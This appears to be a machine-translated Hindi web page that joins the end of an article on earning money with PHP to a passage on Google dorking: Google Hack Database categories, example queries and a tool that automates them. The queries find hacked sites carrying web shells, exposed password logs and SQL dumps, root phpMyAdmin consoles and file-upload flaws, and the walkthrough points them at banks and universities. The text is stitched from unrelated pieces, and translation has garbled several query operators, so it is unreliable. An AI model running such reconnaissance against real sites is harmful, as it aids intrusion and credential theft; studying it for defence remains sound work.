मैं यह भी जोड़ूंगा कि दुनिया की सबसे बड़ी साइटें, उदाहरण के लिए, फेसबुक, विकिपीडिया, भी PHP में लिखी गई हैं।

आप PHP के ज्ञान से पैसे कैसे कमा सकते हैं?

PHP की लोकप्रियता को देखते हुए, PHP प्रोग्रामर्स की लगातार उच्च मांग बनी हुई है। PHP का ज्ञान होने और इस भाषा में प्रोग्राम करने में सक्षम होने से पैसे कमाने के नए अवसर खुलेंगे। आइए उन मुख्य चीज़ों पर नज़र डालें जिनसे आप आज सचमुच पैसा कमा सकते हैं:

स्क्रिप्ट विकसित करके पैसा कमाना। सभी साइटें लगातार विकसित हो रही हैं, और उन्हें समय-समय पर नई स्क्रिप्ट लिखने, या अतिरिक्त कार्यक्षमता, मॉड्यूल आदि के विकास की आवश्यकता होती है। ऐसे विकास के लिए, साइट मालिक PHP डेवलपर्स की ओर रुख करते हैं। इसके अलावा, इस मामले में आप दो तरीकों से पैसा कमा सकते हैं:

फ्रीलांस डेवलपर ढूंढने के लिए ऑर्डर ट्रैक करें;

सामूहिक लिपियों के लिए विचार उत्पन्न करें। एक स्क्रिप्ट का विचार होने पर, जो निश्चित रूप से, उदाहरण के लिए, ऑनलाइन स्टोर के मालिकों के बीच मांग में होगी, आप स्वतंत्र रूप से ऐसी स्क्रिप्ट विकसित कर सकते हैं और इसे ऑनलाइन स्टोर मालिकों को बेच सकते हैं;

"ऑर्डर करने के लिए" तैयार स्क्रिप्ट को अंतिम रूप देना। यहां सब कुछ सरल है - आप किसी स्क्रिप्ट में संशोधन या सुधार का कार्य करते हैं। लेकिन इस मामले में, एक बारीकियां है - शुरुआत में स्क्रिप्ट बहुत अच्छी तरह से नहीं बनाई जा सकती है, और इसके शोधन में स्क्रैच से स्क्रिप्ट लिखने की तुलना में अधिक समय लग सकता है। इसलिए, यदि आप पैसे कमाने के इस तरीके का उपयोग करते हैं, तो शुरू में बहुत ध्यान से देखें कि आप क्या संशोधित और पूरा करेंगे।

सीएमएस के लिए प्लगइन्स का विकास। इस पद्धति में सब कुछ वैसा ही है जैसा स्क्रिप्ट से पैसा कमाते समय होता है। अक्सर, रेडीमेड सीएमएस पर बनाई गई वेबसाइटों को किसी प्रकार के प्लगइन, ऐड-ऑन या एक्सटेंशन लिखने की आवश्यकता होती है। और आप यहां दो तरह से पैसा कमा सकते हैं:

फ्रीलांस आधार पर प्लगइन्स, ऐड-ऑन और एक्सटेंशन के विकास के लिए ऑर्डर ट्रैक करें;

एक व्यापक प्लगइन विकसित करें और बेचें जो निश्चित रूप से अधिकांश साइटों पर मांग में होगा;

स्वयं की और संयुक्त परियोजनाएँ। यदि आपके पास किसी इंटरनेट प्रोजेक्ट (स्टार्टअप) के लिए कोई विचार है, उदाहरण के लिए, किसी उपयोगी सेवा या एप्लिकेशन के लिए एक विचार जो किसी विशिष्ट समस्या का समाधान करेगा, तो आप इसे लागू करना शुरू कर सकते हैं। शुरुआती चरण में यह आपके मुख्य काम के अलावा सिर्फ एक शौक के तौर पर भी हो सकता है। फिर, जब यह स्पष्ट हो जाए कि शौक एक बड़े प्रोजेक्ट के रूप में विकसित हो रहा है, तो इसके लिए अधिक समय देना संभव होगा।

उनके लिए गतिशील वेबसाइटों और इंजनों का निर्माण। आप कस्टम वेबसाइट विकसित करके, फ्रीलांसर के रूप में या वेब स्टूडियो में काम करके भी अच्छा पैसा कमा सकते हैं।

अपने लिए वेबसाइट बनाना. आप अपने लिए एक वेबसाइट बना सकते हैं, उसे उपयोगी सामग्री से भर सकते हैं - और जब साइट पर पर्याप्त संख्या में विज़िटर हों, तो उस पर सशुल्क विज्ञापन देकर या संबद्ध कार्यक्रमों के माध्यम से किसी के उत्पादों को बढ़ावा देकर पैसा कमाना शुरू करें।

मुझे लगता है कि आप में से कई लोगों ने सोचा होगा कि पैसे कमाने के उपरोक्त सभी तरीकों को जोड़ा जा सकता है। और यह सही है! आप अपने लिए एक वेबसाइट बना सकते हैं और उसमें विज्ञापन बेचकर निष्क्रिय रूप से पैसा कमा सकते हैं, साथ ही एक स्क्रिप्ट या प्लगइन बनाकर उसे विशेष साइटों पर बेच सकते हैं, प्रत्येक बिक्री से ऑटोपायलट पर पैसा कमा सकते हैं, और साथ ही आप वेब पर भी काम कर सकते हैं स्टूडियो. क्यों नहीं? निःसंदेह तुमसे हो सकता है!

एक PHP डेवलपर कितना कमा सकता है?

PHP प्रोग्रामर की कमाई के साथ, सब कुछ व्यक्तिगत है। यहां बहुत कुछ इस बात पर निर्भर करता है कि कहां काम करना है, कैसे काम करना है, किस स्तर का ज्ञान है, क्या अनुभव है, क्या योग्यताएं हैं, डेवलपर के पास क्या अतिरिक्त ज्ञान है, इत्यादि। इसलिए, सिद्धांत रूप में, यहां कोई सटीक आंकड़ा नहीं हो सकता है। लेकिन हम यह देख सकते हैं कि वेब स्टूडियो में PHP प्रोग्रामर की खोज करते समय उन्हें कितना वेतन दिया जाता है, और वे फ्रीलांस एक्सचेंजों पर एक प्रोजेक्ट के लिए कितना भुगतान करने को तैयार हैं।

नीचे दी गई छवि एक वेब स्टूडियो में PHP प्रोग्रामर के लिए प्रस्तावित वेतन दिखाती है। इसके अलावा, यह बिना कार्य अनुभव वाले PHP प्रोग्रामर के लिए वेतन है:

यदि आपके पास कार्य अनुभव है, तो आप बहुत अधिक कमा सकते हैं। अनुभवी PHP प्रोग्रामर को दिए जाने वाले वेतन नीचे दिए गए हैं।

और आज आप फ्रीलांसिंग से भी अच्छा पैसा कमा सकते हैं:

निष्कर्ष

PHP वेब डेवलपर्स के बीच सबसे लोकप्रिय प्रोग्रामिंग भाषा है। इंटरनेट पर अधिकांश वेबसाइटें PHP में लिखी गई हैं। इस प्रोग्रामिंग भाषा में ज्ञान और विकास करने की क्षमता होने पर, आप अच्छा पैसा कमा सकते हैं, और पैसे कमाने के कई विकल्प हैं - वेब स्टूडियो में काम करने से लेकर अपना खुद का प्रोजेक्ट या स्टार्टअप विकसित करने तक।

वेब संसाधनों पर कमजोरियों की कोई भी खोज टोही और सूचना संग्रह से शुरू होती है।
इंटेलिजेंस या तो सक्रिय हो सकता है - साइट की फ़ाइलों और निर्देशिकाओं का क्रूर बल, भेद्यता स्कैनर चलाना, साइट को मैन्युअल रूप से ब्राउज़ करना, या निष्क्रिय - विभिन्न खोज इंजनों में जानकारी की खोज करना। कभी-कभी ऐसा होता है कि साइट का पहला पेज खुलने से पहले ही किसी भेद्यता का पता चल जाता है।

यह कैसे संभव है?
खोज रोबोट, जो लगातार इंटरनेट पर घूम रहे हैं, औसत उपयोगकर्ता के लिए उपयोगी जानकारी के अलावा, अक्सर उन चीजों को रिकॉर्ड करते हैं जिनका उपयोग हमलावरों द्वारा वेब संसाधन पर हमला करने के लिए किया जा सकता है। उदाहरण के लिए, स्क्रिप्ट त्रुटियाँ और संवेदनशील जानकारी वाली फ़ाइलें (कॉन्फ़िगरेशन फ़ाइलों और लॉग से लेकर प्रमाणीकरण डेटा और डेटाबेस बैकअप वाली फ़ाइलों तक)।
एक खोज रोबोट के दृष्टिकोण से, एक एसक्यूएल क्वेरी निष्पादित करने के बारे में एक त्रुटि संदेश सादा पाठ है, उदाहरण के लिए, पृष्ठ पर उत्पादों के विवरण से अविभाज्य है। यदि अचानक किसी खोज रोबोट को .sql एक्सटेंशन वाली कोई फ़ाइल मिल जाती है, जो किसी कारण से साइट के कार्यशील फ़ोल्डर में समाप्त हो जाती है, तो इसे साइट की सामग्री के भाग के रूप में माना जाएगा और इसे अनुक्रमित भी किया जाएगा (संभवतः, पासवर्ड सहित) इसमें निर्दिष्ट)।

ऐसी जानकारी मजबूत, अक्सर अद्वितीय, कीवर्ड को जानकर पाई जा सकती है जो "असुरक्षित पृष्ठों" को उन पृष्ठों से अलग करने में मदद करती है जिनमें कमजोरियां नहीं होती हैं।
कीवर्ड (तथाकथित डॉर्क) का उपयोग करने वाले विशेष प्रश्नों का एक विशाल डेटाबेस explore-db.com पर मौजूद है और इसे Google हैक डेटाबेस के रूप में जाना जाता है।

गूगल क्यों?
डॉर्क मुख्य रूप से दो कारणों से Google पर लक्षित हैं:
- कीवर्ड का सबसे लचीला सिंटैक्स (तालिका 1 में दिखाया गया है) और विशेष वर्ण (तालिका 2 में दिखाया गया है);
− Google सूचकांक अभी भी अन्य खोज इंजनों की तुलना में अधिक संपूर्ण है;

तालिका 1 - मुख्य Google कीवर्ड

कीवर्ड
अर्थ
उदाहरण
साइट
केवल निर्दिष्ट साइट पर ही खोजें. केवल यूआरएल को ध्यान में रखता है
साइट:somesite.ru - किसी दिए गए डोमेन और उपडोमेन पर सभी पेज ढूंढेगा
इनयूआरएल
उरी में मौजूद शब्दों के आधार पर खोजें। सीएल के विपरीत. शब्द "साइट", साइट नाम के बाद मिलान की खोज करता है
inurl:news - उन सभी पृष्ठों को ढूँढता है जहाँ दिया गया शब्द uri में दिखाई देता है
पाठ में
पृष्ठ के मुख्य भाग में खोजें
पाठ: "ट्रैफ़िक जाम" - "ट्रैफ़िक जाम" के लिए सामान्य अनुरोध के समान ही
शीर्षक देना
पृष्ठ शीर्षक में खोजें. टैग के बीच पाठ <br></td> <td width="214">intitle:"index of" - निर्देशिका सूची वाले सभी पृष्ठ मिलेंगे <br></td> </tr><tr><td width="214">विस्तार <br></td> <td width="214">निर्दिष्ट एक्सटेंशन वाले पेज खोजें <br></td> <td width="214">ext:pdf - सभी पीडीएफ फ़ाइलें ढूंढता है <br></td> </tr><tr><td width="214">फाइल का प्रकार <br></td> <td width="214">वर्तमान में, पूरी तरह से वर्ग के समान. शब्द "एक्सट" <br></td> <td width="214">फ़ाइल प्रकार: पीडीएफ - समान <br></td> </tr><tr><td width="214">संबंधित <br></td> <td width="214">समान विषयों वाली साइटें खोजें <br></td> <td width="214">संबंधित:google.ru - इसके एनालॉग्स दिखाएगा <br></td> </tr><tr><td width="214">जोड़ना <br></td> <td width="214">इससे लिंक करने वाली साइटें खोजें <br></td> <td width="214">लिंक:somesite.ru - उन सभी साइटों को ढूंढेगा जिनके पास इसका लिंक है <br></td> </tr><tr><td width="214">परिभाषित करना <br></td> <td width="214">शब्द परिभाषा दिखाएँ <br></td> <td width="214">परिभाषित करें:0 दिन - शब्द की परिभाषा <br></td> </tr><tr><td width="214">कैश <br></td> <td width="214">कैश में पृष्ठ सामग्री दिखाएँ (यदि मौजूद हो) <br></td> <td width="214">कैश:google.com - एक कैश्ड पेज खुलेगा <br></td> </tr></tbody></table><p>तालिका 2 - Google क्वेरी के लिए विशेष वर्ण <br></p><table><tbody><tr><td width="214"><b>प्रतीक</b><br></td> <td width="214"><b>अर्थ</b><br></td> <td width="214"><b>उदाहरण</b><br></td> </tr><tr><td width="214">“<br></td> <td width="214">सटीक वाक्यांश <br></td> <td width="214">शीर्षक:"राउटरओएस राउटर कॉन्फ़िगरेशन पृष्ठ" - राउटर खोजें <br></td> </tr><tr><td width="214">*<br></td> <td width="214">कोई भी पाठ <br></td> <td width="214">inurl: "bitrix*mcart" - कमजोर mcart मॉड्यूल के साथ bitrix पर साइटों की खोज करें <br></td> </tr><tr><td width="214">.<br></td> <td width="214">कोई भी पात्र <br></td> <td width="214">Index.of - अनुरोध के सूचकांक के समान <br></td> </tr><tr><td width="214">-<br></td> <td width="214">एक शब्द हटाएँ <br></td> <td width="214">त्रुटि-चेतावनी - वे सभी पृष्ठ दिखाएँ जिनमें त्रुटि है लेकिन कोई चेतावनी नहीं है <br></td> </tr><tr><td width="214">..<br></td> <td width="214">श्रेणी <br></td> <td width="214">सीवीई 2006..2016 - 2006 से शुरू होने वाले वर्ष के अनुसार कमजोरियां दिखाएं <br></td> </tr><tr><td width="214">|<br></td> <td width="214">तार्किक "या" <br></td> <td width="214">लिनक्स | विंडोज़ - वे पृष्ठ दिखाएं जहां पहला या दूसरा शब्द दिखाई देता है <br></td> </tr></tbody></table><br>यह समझने योग्य है कि किसी खोज इंजन से कोई भी अनुरोध केवल शब्दों द्वारा की जाने वाली खोज है। <br>पृष्ठ पर मेटा-वर्णों (उद्धरण, कोष्ठक, विराम चिह्न, आदि) को देखना बेकार है। यहां तक ​​कि उद्धरण चिह्नों में निर्दिष्ट सटीक वाक्यांश की खोज भी एक शब्द खोज है, जिसके बाद परिणामों में सटीक मिलान की खोज होती है। <p>सभी Google हैक डेटाबेस डॉर्क को तार्किक रूप से 14 श्रेणियों में विभाजित किया गया है और तालिका 3 में प्रस्तुत किया गया है। <br>तालिका 3 - Google हैक डेटाबेस श्रेणियाँ <br></p><table><tbody><tr><td width="168"><b>वर्ग</b><br></td> <td width="190"><b>आपको क्या खोजने की अनुमति देता है</b><br></td> <td width="284"><b>उदाहरण</b><br></td> </tr><tr><td width="168">तलहटी <br></td> <td width="190">वेब शेल, सार्वजनिक फ़ाइल प्रबंधक <br></td> <td width="284">उन सभी हैक की गई साइटों को ढूंढें जहां सूचीबद्ध वेबशेल अपलोड किए गए हैं: <br>(इनटाइटल:"phpshell" या इनटाइटल:"c99shell" या इनटाइटल:"r57shell" या इनटाइटल:"PHP शेल" या इनटाइटल:"phpRemoteView") `rwx` "uname" <br></td> </tr><tr><td width="168">उपयोगकर्ता नाम वाली फ़ाइलें <br></td> <td width="190">रजिस्ट्री फ़ाइलें, कॉन्फ़िगरेशन फ़ाइलें, लॉग, दर्ज किए गए आदेशों का इतिहास वाली फ़ाइलें <br></td> <td width="284">खाता जानकारी वाली सभी रजिस्ट्री फ़ाइलें ढूंढें: <br><i>फ़ाइल प्रकार:reg reg+intext:“इंटरनेट खाता प्रबंधक”</i><br></td> </tr><tr><td width="168">संवेदनशील निर्देशिकाएँ <br></td> <td width="190">विभिन्न सूचनाओं वाली निर्देशिकाएँ (व्यक्तिगत दस्तावेज़, वीपीएन कॉन्फ़िगरेशन, छिपी हुई रिपॉजिटरी, आदि) <br></td> <td width="284">वीपीएन-संबंधित फ़ाइलों वाली सभी निर्देशिका सूची ढूंढें: <br><i>"कॉन्फिग" शीर्षक:"अनुक्रमणिका" पाठ:वीपीएन</i><br>Git रिपॉजिटरी वाली साइटें: <br><i>(पाठ:"/.git का सूचकांक") ("मूल निर्देशिका")</i><br></td> </tr><tr><td width="168">वेब सर्वर का पता लगाना <br></td> <td width="190">संस्करण और वेब सर्वर के बारे में अन्य जानकारी <br></td> <td width="284">जेबॉस सर्वर प्रशासनिक कंसोल ढूंढें: <br><i>inurl:"/वेब-कंसोल/" शीर्षक:"प्रशासन कंसोल"</i><br></td> </tr><tr><td width="168">कमज़ोर फ़ाइलें <br></td> <td width="190">ज्ञात कमजोरियाँ युक्त स्क्रिप्ट <br></td> <td width="284">ऐसी साइटें ढूंढें जो ऐसी स्क्रिप्ट का उपयोग करती हैं जो आपको सर्वर से एक मनमानी फ़ाइल अपलोड करने की अनुमति देती है: <br><i>allinurl:forcedownload.php?file=</i><br></td> </tr><tr><td width="168">कमज़ोर सर्वर <br></td> <td width="190">इंस्टालेशन स्क्रिप्ट, वेब शेल, ओपन एडमिनिस्ट्रेटिव कंसोल आदि। <br></td> <td width="284">रूट के रूप में चल रहे खुले PHPMyAdmin कंसोल ढूंढें: <br><i>शीर्षक:phpMyAdmin "PhpMyAdmin में आपका स्वागत है ***" "* रूट@* के रूप में चल रहा है"</i><br></td> </tr><tr><td width="168">त्रुटि संदेश <br></td> <td width="190">विभिन्न त्रुटियाँ और चेतावनियाँ अक्सर महत्वपूर्ण जानकारी प्रकट करती हैं - सीएमएस संस्करण से लेकर पासवर्ड तक <br></td> <td width="284">वे साइटें जिनमें डेटाबेस में SQL क्वेरी निष्पादित करने में त्रुटियाँ हैं: <br><i>"चेतावनी: mysql_query()" "अमान्य क्वेरी"</i><br></td> </tr><tr><td width="168">रसपूर्ण जानकारी वाली फ़ाइलें <br></td> <td width="190">प्रमाणपत्र, बैकअप, ईमेल, लॉग, SQL स्क्रिप्ट, आदि। <br></td> <td width="284">आरंभीकरण एसक्यूएल स्क्रिप्ट खोजें: <br><i>फ़ाइल प्रकार: एसक्यूएल और "इन्सर्ट इन" - साइट: github.com</i><br></td> </tr><tr><td width="168">पासवर्ड वाली फ़ाइलें <br></td> <td width="190">कुछ भी जिसमें पासवर्ड हो सकते हैं - लॉग, एसक्यूएल स्क्रिप्ट इत्यादि। <br></td> <td width="284">पासवर्ड का उल्लेख करने वाले लॉग: <br><i>फाइल का प्रकार:</i><i>लकड़ी का लट्ठा</i><i>पाठ में:</i><i>पासवर्ड |</i><i>पास |</i><i>पीडब्लू</i><br>पासवर्ड युक्त एसक्यूएल स्क्रिप्ट: <br><i>विस्तार:</i><i>एसक्यूएल</i><i>पाठ में:</i><i>उपयोगकर्ता नाम</i><i>पाठ में:</i><i>पासवर्ड</i><br></td> </tr><tr><td width="168">संवेदनशील ऑनलाइन शॉपिंग जानकारी <br></td> <td width="190">ऑनलाइन खरीदारी से संबंधित जानकारी <br></td> <td width="284">पिनकोड खोजें: <br><i>डीसीआईडी=</i><i>बीएन=</i><i>नत्थी करना</i><i>कोड=</i><br></td> </tr><tr><td width="168">नेटवर्क या भेद्यता डेटा <br></td> <td width="190">जानकारी सीधे तौर पर वेब संसाधन से संबंधित नहीं है, लेकिन नेटवर्क या अन्य गैर-वेब सेवाओं को प्रभावित करती है <br></td> <td width="284">आंतरिक नेटवर्क के बारे में जानकारी वाली स्वचालित प्रॉक्सी कॉन्फ़िगरेशन स्क्रिप्ट ढूंढें: <br><i>inurl:प्रॉक्सी | inurl:wpad ext:pac | पाठ: वह ढूंढेंproxyforurl</i><br></td> </tr><tr><td width="168">लॉगिन पोर्टल वाले पृष्ठ <br></td> <td width="190">लॉगिन फॉर्म वाले पेज <br></td> <td width="284">सैप्लोगोन वेब पेज: <br><i>पाठ:"2016 एसएपी एजी। सर्वाधिकार सुरक्षित।" शीर्षक:"लॉगऑन"</i><br></td> </tr><tr><td width="168">विभिन्न ऑनलाइन उपकरण <br></td> <td width="190">प्रिंटर, राउटर, मॉनिटरिंग सिस्टम आदि। <br></td> <td width="284">प्रिंटर कॉन्फ़िगरेशन पैनल ढूंढें: <br><i>शीर्षक:"</i><i>अश्वशक्ति</i><i>लेजरजेट"</i><i>inurl:</i><i>एसएसआई/</i><i>प्रामाणिक/</i><i>तय करना_</i><i>config_</i><i>डिवाइस जानकारी।</i><i>htm</i><br></td> </tr><tr><td width="168">सलाह और कमजोरियाँ <br></td> <td width="190">असुरक्षित सीएमएस संस्करणों पर वेबसाइटें <br></td> <td width="284">असुरक्षित प्लगइन्स ढूंढें जिसके माध्यम से आप सर्वर पर एक मनमानी फ़ाइल अपलोड कर सकते हैं: <br><i>inurl:fckeditor -intext:"ConfigIsEnabled = False" intext:ConfigIsEnabled</i><br></td> </tr></tbody></table><br>डॉर्क अक्सर सभी इंटरनेट साइटों पर खोज करने पर अधिक ध्यान केंद्रित करते हैं। लेकिन कोई भी चीज़ आपको किसी भी साइट या साइटों पर खोज के दायरे को सीमित करने से नहीं रोकती है। <br>प्रत्येक Google क्वेरी को क्वेरी में "site:somesite.com" कीवर्ड जोड़कर एक विशिष्ट साइट पर केंद्रित किया जा सकता है। यह कीवर्ड किसी भी डॉर्क में जोड़ा जा सकता है। <p><b>कमजोरियों की खोज को स्वचालित करना</b><br>इस प्रकार एक सरल उपयोगिता लिखने का विचार पैदा हुआ जो एक खोज इंजन (Google) का उपयोग करके कमजोरियों की खोज को स्वचालित करता है और Google हैक डेटाबेस पर निर्भर करता है।</p><p>उपयोगिता फैंटमज का उपयोग करके नोडज में लिखी गई एक स्क्रिप्ट है। सटीक होने के लिए, स्क्रिप्ट की व्याख्या फैंटमज द्वारा ही की जाती है। <br>फैंटमजेएस बिना जीयूआई वाला एक पूर्ण वेब ब्राउज़र है, जो जेएस कोड द्वारा नियंत्रित और एक सुविधाजनक एपीआई के साथ है। <br>उपयोगिता को काफी समझने योग्य नाम मिला - डॉर्क्स। इसे कमांड लाइन (विकल्पों के बिना) पर चलाने से, हमें उपयोग के कई उदाहरणों के साथ संक्षिप्त सहायता मिलती है: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/edd/6fb/ccc/edd6fbccc5ec340abe750f3073c1b427.jpg' width="100%" loading=lazy loading=lazy><br>चित्र 1 - मुख्य डॉर्क विकल्पों की सूची</p><p>उपयोगिता का सामान्य सिंटैक्स है: डॉर्क "कमांड" "विकल्प सूची"। <br>सभी विकल्पों का विस्तृत विवरण तालिका 4 में प्रस्तुत किया गया है।</p><p>तालिका 4 - डॉर्क सिंटैक्स <br></p><table border="1"><tbody><tr><td width="214"><b>टीम</b><br></td> <td width="214"><b>विकल्प</b><br></td> <td width="214"><b>विवरण</b><br></td> </tr><tr><td rowspan="4" width="214">ghdb <br></td> <td width="214">-एल <br></td> <td width="214">Google हैक डेटाबेस डॉर्क श्रेणियों की एक क्रमांकित सूची प्रिंट करें <br></td> </tr><tr><td width="214">-सी "श्रेणी संख्या या नाम" <br></td> <td width="214">निर्दिष्ट श्रेणी के दरवाजे संख्या या नाम से लोड करें <br></td> </tr><tr><td width="214">-q "वाक्यांश" <br></td> <td width="214">अनुरोध के अनुसार डाउनलोड डॉर्क मिले <br></td> </tr><tr><td width="214">-o "फ़ाइल" <br></td> <td width="214">परिणाम को एक फ़ाइल में सहेजें (केवल -c|-q विकल्पों के साथ) <br></td> </tr><tr><td rowspan="8" width="214">गूगल <br></td> <td width="214">-डी "डॉर्क" <br></td> <td width="214">एक मनमाना डॉर्क सेट करें (विकल्प का उपयोग कई बार किया जा सकता है, -D विकल्प के साथ संयोजन की अनुमति है) <br></td> </tr><tr><td width="214">-डी "फ़ाइल" <br></td> <td width="214">फ़ाइल से डॉर्क का उपयोग करें <br></td> </tr><tr><td width="214">-एस "साइट" <br></td> <td width="214">साइट सेट करें (विकल्प का उपयोग कई बार किया जा सकता है, विकल्प -S के साथ संयोजन की अनुमति है) <br></td> </tr><tr><td width="214">-एस "फ़ाइल" <br></td> <td width="214">किसी फ़ाइल से साइटों का उपयोग करें (प्रत्येक साइट के लिए डॉर्क स्वतंत्र रूप से खोजे जाएंगे) <br></td> </tr><tr><td width="214">-f "फ़िल्टर" <br></td> <td width="214">अतिरिक्त कीवर्ड सेट करें (प्रत्येक डॉर्क में जोड़े जाएंगे) <br></td> </tr><tr><td width="214">-t "एमएस की संख्या" <br></td> <td width="214">Google से अनुरोधों के बीच अंतराल <br></td> </tr><tr><td width="214">-टी "एमएस की संख्या" <br></td> <td width="214">कैप्चा मिलने पर टाइमआउट <br></td> </tr><tr><td width="214">-o "फ़ाइल" <br></td> <td width="214">परिणाम को एक फ़ाइल में सहेजें (केवल वे ट्रैक सहेजे जाएंगे जिनके लिए कुछ पाया गया था) <br></td> </tr></tbody></table><br>जीएचडीबी कमांड का उपयोग करके, आप मनमाने अनुरोध द्वारा शोषण-डीबी से सभी डॉर्क प्राप्त कर सकते हैं, या संपूर्ण श्रेणी निर्दिष्ट कर सकते हैं। यदि आप श्रेणी 0 निर्दिष्ट करते हैं, तो संपूर्ण डेटाबेस अनलोड हो जाएगा (लगभग 4.5 हजार डॉर्क)। <p>वर्तमान में उपलब्ध श्रेणियों की सूची चित्र 2 में प्रस्तुत की गई है। <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/b8f/b11/ffe/b8fb11ffeaced5066fd2fd9e43be67fb.jpg' width="100%" loading=lazy loading=lazy></p><p>चित्र 2 - उपलब्ध जीएचडीबी डॉर्क श्रेणियों की सूची</p><p>Google टीम प्रत्येक डॉर्क को Google खोज इंजन में प्रतिस्थापित करेगी और मैचों के परिणाम का विश्लेषण करेगी। वे पथ जहां कुछ पाया गया था, एक फ़ाइल में सहेजे जाएंगे। <br>उपयोगिता विभिन्न खोज मोड का समर्थन करती है: <br>1 डॉर्क और 1 साइट; <br>1 डॉर्क और कई साइटें; <br>1 साइट और कई डॉर्क; <br>कई साइटें और कई डॉर्क; <br>डॉर्क और साइटों की सूची या तो एक तर्क के माध्यम से या एक फ़ाइल के माध्यम से निर्दिष्ट की जा सकती है।</p><p><b>कार्य का प्रदर्शन</b><br>आइए त्रुटि संदेशों की खोज के उदाहरण का उपयोग करके किसी भी कमजोरियों को देखने का प्रयास करें। कमांड द्वारा: dorks ghdb –c 7 –o error.dorks “त्रुटि संदेश” श्रेणी के सभी ज्ञात डॉर्क लोड किए जाएंगे जैसा कि चित्र 3 में दिखाया गया है। <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/28c/386/641/28c386641d1528652f7f8e8b8089097a.jpg' width="100%" loading=lazy loading=lazy><br>चित्र 3 - "त्रुटि संदेश" श्रेणी के सभी ज्ञात डॉर्क लोड हो रहे हैं</p><p>डॉर्क डाउनलोड किए जाते हैं और एक फ़ाइल में सहेजे जाते हैं। अब जो कुछ बचा है वह उन्हें किसी साइट पर "सेट" करना है (चित्र 4 देखें)। <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/8e0/a8a/3af/8e0a8a3af4f26544da1faa584813dbff.jpg' width="100%" loading=lazy loading=lazy><br>चित्र 4 - Google कैश में रुचि की साइट की कमजोरियों की खोज करें</p><p>कुछ समय बाद, अध्ययन के तहत साइट पर त्रुटियों वाले कई पृष्ठ पाए गए (चित्र 5 देखें)।</p><p><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/10b/e83/ba3/10be83ba38f172213ba06b3f9ad05a58.jpg' width="100%" loading=lazy loading=lazy><br>चित्र 5 - त्रुटि संदेश मिले</p><p>परिणामस्वरूप, परिणाम.txt फ़ाइल में हमें उन डॉर्क्स की पूरी सूची मिलती है जो त्रुटि का कारण बनते हैं। <br>चित्र 6 साइट त्रुटियों की खोज का परिणाम दिखाता है। <br><br>चित्र 6 - त्रुटि खोज परिणाम</p><p>इस डॉर्क के कैश में, एक पूर्ण बैकट्रेस प्रदर्शित होता है, जो स्क्रिप्ट के पूर्ण पथ, साइट सामग्री प्रबंधन प्रणाली और डेटाबेस प्रकार को प्रकट करता है (चित्र 7 देखें)। <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/0a9/455/588/0a9455588496d6609f5e13d598cb5a48.jpg' width="100%" loading=lazy loading=lazy><br>चित्र 7 - साइट डिज़ाइन के बारे में जानकारी का खुलासा</p><p>हालाँकि, यह विचार करने योग्य है कि GHDB के सभी डॉर्क सही परिणाम नहीं देते हैं। साथ ही, हो सकता है कि Google सटीक मिलान न ढूंढे और समान परिणाम दिखाए।</p><p>इस मामले में, डॉर्कों की अपनी व्यक्तिगत सूची का उपयोग करना बुद्धिमानी है। उदाहरण के लिए, हमेशा "असामान्य" एक्सटेंशन वाली फ़ाइलों की तलाश करना उचित होता है, जिनके उदाहरण चित्र 8 में दिखाए गए हैं। <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/d7f/865/693/d7f865693f7fcf13137598eeed0ecb58.jpg' width="100%" loading=lazy loading=lazy><br>चित्र 8 - फ़ाइल एक्सटेंशन की सूची जो नियमित वेब संसाधन के लिए विशिष्ट नहीं हैं</p><p>परिणामस्वरूप, डॉर्क्स गूगल -डी एक्सटेंशन्स.टीएक्सटी -एफ बैंक कमांड के साथ, पहले अनुरोध से ही Google "असामान्य" फ़ाइल एक्सटेंशन वाली साइटों को वापस करना शुरू कर देता है (चित्र 9 देखें)। <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/107/e1f/a2f/107e1fa2f41c4169bcc254cba2f2f4b6.jpg' width="100%" loading=lazy loading=lazy><br>चित्र 9 - बैंकिंग वेबसाइटों पर "खराब" फ़ाइल प्रकार खोजें</p><p>यह ध्यान रखने योग्य बात है कि Google 32 शब्दों से अधिक लंबी क्वेरी स्वीकार नहीं करता है।</p><p>डॉर्क्स गूगल –डी इनटेक्स्ट कमांड का उपयोग करना:”त्रुटि|चेतावनी|नोटिस|सिंटैक्स” –एफ विश्वविद्यालय <br>आप शैक्षिक वेबसाइटों पर PHP दुभाषिया त्रुटियों को देख सकते हैं (चित्र 10 देखें)। <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/717/74f/e36/71774fe3656bfc058c42d43262fdec4a.jpg' width="100%" loading=lazy loading=lazy><br>चित्र 10 - PHP रनटाइम त्रुटियाँ ढूँढना</p><p>कभी-कभी एक या दो श्रेणियों के डॉर्कों का उपयोग करना सुविधाजनक नहीं होता है। <br>उदाहरण के लिए, यदि यह ज्ञात है कि साइट वर्डप्रेस इंजन पर चलती है, तो हमें वर्डप्रेस-विशिष्ट मॉड्यूल की आवश्यकता है। इस मामले में, Google हैक डेटाबेस खोज का उपयोग करना सुविधाजनक है। कमांड dorks ghdb –q WordPress –o WordPress_dorks.txt वर्डप्रेस से सभी डॉर्क डाउनलोड करेगा, जैसा चित्र 11 में दिखाया गया है: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/dcb/ac9/a4e/dcbac9a4eb12f6ec775d9cccc2fdee87.jpg' width="100%" loading=lazy loading=lazy><br>चित्र 11 - वर्डप्रेस से संबंधित डॉर्क्स की खोज करें</p><p>आइए फिर से बैंकों पर वापस जाएं और वर्डप्रेस से संबंधित कुछ दिलचस्प खोजने का प्रयास करने के लिए कमांड डॉर्क्स गूगल -डी वर्डप्रेस_डॉर्ड्स.txt -एफ बैंक का उपयोग करें (चित्र 12 देखें)। <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/042/0c2/c43/0420c2c435931704288b171f725ccc6a.jpg' width="100%" loading=lazy loading=lazy><br>चित्र 12 - वर्डप्रेस कमजोरियों की खोज करें</p><p>ध्यान देने वाली बात यह है कि Google Hack Database पर सर्च 4 अक्षरों से छोटे शब्दों को स्वीकार नहीं करता है। उदाहरण के लिए, यदि साइट का सीएमएस ज्ञात नहीं 